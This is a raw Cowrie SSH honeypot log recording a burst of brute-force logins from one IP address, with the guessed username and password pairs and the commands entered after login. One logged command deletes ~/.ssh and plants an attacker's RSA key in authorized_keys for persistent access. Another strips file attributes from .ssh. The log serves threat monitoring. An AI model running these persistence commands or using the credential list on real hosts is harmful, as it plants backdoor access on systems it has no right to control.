{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T22:49:35.661620Z","src_ip":"212.227.235.229","session":"f79790dbc489"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T22:49:35.974443Z","src_ip":"212.227.235.229","session":"f79790dbc489"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:49:35.975314Z","src_ip":"212.227.235.229","session":"f79790dbc489"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39110,"dst_ip":"1.2.3.4","dst_port":22,"session":"f63d7a1f3f96","protocol":"ssh","message":"New connection: 212.227.235.229:39110 (1.2.3.4:22) [session: f63d7a1f3f96]","sensor":"my-vps","timestamp":"2025-09-08T22:49:36.284243Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:49:36.285082Z","src_ip":"212.227.235.229","session":"f63d7a1f3f96"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:49:36.595927Z","src_ip":"212.227.235.229","session":"f63d7a1f3f96"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T22:49:37.881723Z","src_ip":"212.227.235.229","session":"f63d7a1f3f96"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:49:39.195046Z","src_ip":"212.227.235.229","session":"f63d7a1f3f96"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40102,"dst_ip":"1.2.3.4","dst_port":22,"session":"b6ea4b5cf201","protocol":"ssh","message":"New connection: 212.227.235.229:40102 (1.2.3.4:22) [session: b6ea4b5cf201]","sensor":"my-vps","timestamp":"2025-09-08T22:49:39.504956Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:49:39.505856Z","src_ip":"212.227.235.229","session":"b6ea4b5cf201"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:49:39.816300Z","src_ip":"212.227.235.229","session":"b6ea4b5cf201"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:49:41.100904Z","src_ip":"212.227.235.229","session":"b6ea4b5cf201"}
{"eventid":"cowrie.session.closed","duration":"9.0","message":"Connection lost after 9.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:49:41.412738Z","src_ip":"212.227.235.229","session":"f79790dbc489"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:49:41.414109Z","src_ip":"212.227.235.229","session":"b6ea4b5cf201"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54866,"dst_ip":"1.2.3.4","dst_port":22,"session":"b1dd461779d7","protocol":"ssh","message":"New connection: 212.227.235.229:54866 (1.2.3.4:22) [session: b1dd461779d7]","sensor":"my-vps","timestamp":"2025-09-08T22:49:42.360778Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:49:42.361625Z","src_ip":"212.227.235.229","session":"b1dd461779d7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:49:42.593723Z","src_ip":"212.227.235.229","session":"b1dd461779d7"}
{"eventid":"cowrie.login.success","username":"root","password":"P@ssw0rd2025","message":"login attempt [root/P@ssw0rd2025] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:49:43.556250Z","src_ip":"212.227.235.229","session":"b1dd461779d7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:49:44.037836Z","src_ip":"212.227.235.229","session":"b1dd461779d7"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:49:44.038561Z","src_ip":"212.227.235.229","session":"b1dd461779d7"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:49:44.039354Z","src_ip":"212.227.235.229","session":"b1dd461779d7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:49:44.271446Z","src_ip":"212.227.235.229","session":"b1dd461779d7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:49:44.836738Z","src_ip":"212.227.235.229","session":"b1dd461779d7"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T22:49:44.837436Z","src_ip":"212.227.235.229","session":"b1dd461779d7"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T22:49:45.070400Z","src_ip":"212.227.235.229","session":"b1dd461779d7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:49:45.071370Z","src_ip":"212.227.235.229","session":"b1dd461779d7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54882,"dst_ip":"1.2.3.4","dst_port":22,"session":"68152c9923c8","protocol":"ssh","message":"New connection: 212.227.235.229:54882 (1.2.3.4:22) [session: 68152c9923c8]","sensor":"my-vps","timestamp":"2025-09-08T22:49:45.305043Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:49:45.305706Z","src_ip":"212.227.235.229","session":"68152c9923c8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:49:45.539216Z","src_ip":"212.227.235.229","session":"68152c9923c8"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T22:49:46.514910Z","src_ip":"212.227.235.229","session":"68152c9923c8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47312,"dst_ip":"1.2.3.4","dst_port":22,"session":"54426ac9f791","protocol":"ssh","message":"New connection: 212.227.235.229:47312 (1.2.3.4:22) [session: 54426ac9f791]","sensor":"my-vps","timestamp":"2025-09-08T22:49:47.707536Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:49:47.708421Z","src_ip":"212.227.235.229","session":"54426ac9f791"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:49:47.749171Z","src_ip":"212.227.235.229","session":"68152c9923c8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:49:47.952515Z","src_ip":"212.227.235.229","session":"54426ac9f791"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49176,"dst_ip":"1.2.3.4","dst_port":22,"session":"0c4ac99903ec","protocol":"ssh","message":"New connection: 212.227.235.229:49176 (1.2.3.4:22) [session: 0c4ac99903ec]","sensor":"my-vps","timestamp":"2025-09-08T22:49:47.979338Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:49:47.980912Z","src_ip":"212.227.235.229","session":"0c4ac99903ec"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:49:48.212480Z","src_ip":"212.227.235.229","session":"0c4ac99903ec"}
{"eventid":"cowrie.login.failed","username":"tunnel","password":"changeme","message":"login attempt [tunnel/changeme] failed","sensor":"my-vps","timestamp":"2025-09-08T22:49:48.971473Z","src_ip":"212.227.235.229","session":"54426ac9f791"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:49:49.180757Z","src_ip":"212.227.235.229","session":"0c4ac99903ec"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53836,"dst_ip":"1.2.3.4","dst_port":22,"session":"6fa1d107adbd","protocol":"ssh","message":"New connection: 212.227.235.229:53836 (1.2.3.4:22) [session: 6fa1d107adbd]","sensor":"my-vps","timestamp":"2025-09-08T22:49:49.294496Z"}
{"eventid":"cowrie.session.closed","duration":"7.1","message":"Connection lost after 7.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:49:49.411700Z","src_ip":"212.227.235.229","session":"b1dd461779d7"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:49:49.413271Z","src_ip":"212.227.235.229","session":"0c4ac99903ec"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:49:50.217863Z","src_ip":"212.227.235.229","session":"54426ac9f791"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:49:50.296945Z","src_ip":"212.227.235.229","session":"6fa1d107adbd"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:49:50.297954Z","src_ip":"212.227.235.229","session":"6fa1d107adbd"}
{"eventid":"cowrie.login.success","username":"root","password":"123456xx","message":"login attempt [root/123456xx] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:49:51.364862Z","src_ip":"212.227.235.229","session":"6fa1d107adbd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43066,"dst_ip":"1.2.3.4","dst_port":22,"session":"ff9964da8737","protocol":"ssh","message":"New connection: 212.227.235.229:43066 (1.2.3.4:22) [session: ff9964da8737]","sensor":"my-vps","timestamp":"2025-09-08T22:49:51.705600Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:49:51.706535Z","src_ip":"212.227.235.229","session":"ff9964da8737"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:49:51.949145Z","src_ip":"212.227.235.229","session":"6fa1d107adbd"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:49:51.949999Z","src_ip":"212.227.235.229","session":"6fa1d107adbd"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:49:51.951268Z","src_ip":"212.227.235.229","session":"6fa1d107adbd"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","e